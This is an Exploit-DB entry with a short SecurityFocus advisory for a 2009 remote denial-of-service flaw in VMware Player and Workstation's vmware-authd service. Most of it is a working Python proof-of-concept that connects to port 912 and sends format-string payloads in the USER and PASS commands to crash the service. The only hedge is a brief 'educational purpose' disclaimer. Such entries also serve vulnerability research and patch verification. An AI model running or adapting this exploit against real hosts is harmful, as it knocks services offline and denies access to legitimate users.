VMware Player / VMware Workstation 6.5.3 - 'VMware-authd' Remote Denial of Service

EDB-ID:

33271


Author:

shinnai

Type:

dos


Platform:

Windows

Date:

2009-10-07


source: https://www.securityfocus.com/bid/36630/info

VMware Player and Workstation are prone to a remote denial-of-service vulnerability because the applications fail to perform adequate validation checks on user-supplied input.

An attacker can exploit this issue to crash the 'vmware-authd' process, denying service to legitimate users.

NOTE: This issue was also covered in BID 39345 (VMware Hosted Products VMSA-2010-0007 Multiple Remote and Local Vulnerabilities); this BID is being retained to properly document the issue.

# ----------------------------------------------------------------------------
# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS
# url: http://www.vmware.com/
#
# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Tested on Windows XP Professional Ita SP3 full patched
# ----------------------------------------------------------------------------

# usage: C:\>exploit.py 127.0.0.1 912

import socket
import time
import sys

host = str(sys.argv[1])
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    conn = s.connect((host, port))
    d = s.recv(1024)
    print "Server <- " + d

    s.send('USER \x25\xFF \r\n')
    print 'Sending command "USER" + evil string...'
    d = s.recv(1024)
    print "Server response <- " + d

    s.send('PASS \x25\xFF \r\n')
    print 'Sending command "PASS" + evil string...'
    try:
        d = s.recv(1024)
        print "Server response <- " + d
    except:
        print "\nExploit completed..."
except:
    print "Something goes wrong honey..."